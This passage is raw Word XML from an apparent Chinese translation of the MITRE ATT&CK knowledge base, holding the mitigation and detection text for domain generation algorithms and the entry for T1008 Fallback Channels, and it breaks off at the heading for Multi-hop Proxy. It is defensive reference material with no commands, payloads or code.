        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2122"/>
        <w:gridCol w:w="7614"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A7C85" w:rsidRPr="005A7C85" w14:paraId="771AEB72" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7AE0E816" w14:textId="77777777" w:rsidR="005A7C85" w:rsidRPr="005A7C85" w:rsidRDefault="005A7C85" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A7C85">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2134868F" w14:textId="77777777" w:rsidR="005A7C85" w:rsidRPr="005A7C85" w:rsidRDefault="005A7C85" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A7C85">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A7C85" w:rsidRPr="00A65911" w14:paraId="00149C91" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="1276"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EC769E6" w14:textId="77777777" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId239" w:history="1">
              <w:r w:rsidR="005A7C85" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络入侵防御</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23369591" w14:textId="77777777" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="005A7C85" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用可以通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>网络签名来识别</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特定</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>攻击者恶意软件流量的</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>入侵检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>防御系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来缓解网络级别活动的影响。恶意软件研究人员可以对使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>DGA</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>算法的恶意软件变体进行反向工程，并确定该恶意软件将来会试图联系的域，但这是一项耗费时间和资源的工作。恶意软件也越来越多地加入种子值（这些种子值对于每个实例都是唯一的），然后需要确定这些种子值以提取将来会生成的域。某些情况下，可以从</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>DNS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量中提取特定样本使用的种子。即便如此，每天仍可能产生数千个域。因此，防御程序由于成本而抢先注册所有可能的</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>&amp;C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>域是不切实际的。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A7C85" w:rsidRPr="00A65911" w14:paraId="05EBA14C" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31C725B1" w14:textId="77777777" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId240" w:history="1">
              <w:r w:rsidR="005A7C85" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Web</w:t>
              </w:r>
              <w:r w:rsidR="005A7C85" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>内容</w:t>
              </w:r>
              <w:r w:rsidR="005A7C85" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>限制</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FFDC7ED" w14:textId="69033B82" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="005A7C85" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>某些情况下，可以使用本地</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>DNS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>沉洞来帮助以较低的成本防止基于</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>DGA</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B979E0D" w14:textId="77777777" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="005A7C85" w:rsidP="005A7C85">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42973077" w14:textId="77777777" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="005A7C85" w:rsidP="005A7C85">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2B139B" w14:textId="77777777" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="005A7C85" w:rsidP="005A7C85">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>动态生成的域是一项挑战，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有各式各样的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DGA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>算法，恶意软件家族在不断发展而且算法复杂性也在提高。有多种方法可检测伪随机生成的域名，包括使用频率分析，马尔可夫链，熵，字典单词比例，元音与其他字符的比例等。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域可能会由于其域名格式而触发这些检测。除了基于名称检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DGA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域外，另一种用于检测可疑域的更通用方法是检查最近注册的名称或访问很少的域。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389BFB00" w14:textId="77777777" w:rsidR="005A7C85" w:rsidRPr="00A65911" w:rsidRDefault="005A7C85" w:rsidP="005A7C85">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已经开发了用于检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DGA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域的机器学习方法，并在应用程序中取得了成功。其中一种是使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>N-Gram</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法来确定域名中字符串的随机性得分。如果随机分数很高而且该</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>域没有</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列入</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>白名单（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>），</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则可以确定域是否与合法主机或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DGA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关。另一种是使用深度学习方法将域归类为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DGA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成的域。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6452D115" w14:textId="6FCA35E1" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>失败</w:t>
      </w:r>
      <w:r w:rsidR="00A0413E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>回退</w:t>
      </w:r>
      <w:r w:rsidR="00A0413E">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>道</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC3074" w:rsidRPr="00A65911" w14:paraId="38A2C9FA" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="582C00D9" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1008</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B296617" w14:textId="2041F24B" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E3E515A" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67C3D118" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：恶意软件</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>反向工程，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术网络流分析，网络抓包，进程监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>使用</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E397908" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DE516A6" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="582B5655" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119BE4E8" w14:textId="1663C969" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如果主要渠道遭到破坏或无法访问，则攻击者可能会使用回退或备用通信渠道来维持可靠的</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并避免数据传输阈值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A94C95" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="7473"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC3074" w:rsidRPr="00BC3074" w14:paraId="7DD8B89E" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0DEBC1BB" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00BC3074" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3074">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2873CEFE" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00BC3074" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3074">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC3074" w:rsidRPr="00A65911" w14:paraId="0B9D0FB6" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E2F7723" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId241" w:history="1">
              <w:r w:rsidR="00BC3074" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络入侵防御</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DFA6FB9" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用可以通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>网络签名来识别</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特定</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>攻击者恶意软件流量的</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>入侵检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>防御系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来缓解网络级别活动的影响。签名通常是协议中的唯一指示符，可能基于攻击者或工具的特定协议，并且在各种恶意软件系列和版本中可能会有所不同。攻击者可能会随着时间的推移更改工具</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>&amp;C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>签名，或者构建协议</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>来逃避常见防御工具的检测。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23706434" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C0E360" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFBD622" w14:textId="3B3BF42F" w:rsidR="00BC3074" w:rsidRPr="00BC3074" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析网络数据中不常见的数据流（例如，一个客户端发送的数据比从服务器接收的数据要多得多）。如果以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>不和网络通信的进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>使用了网络，或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从未</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>见过的进程，则是可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析数据包内容来检测未遵循所使用端口的预期协议而</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F3223D" w14:textId="488B79EA" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00A0413E" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>多跳</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代理</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
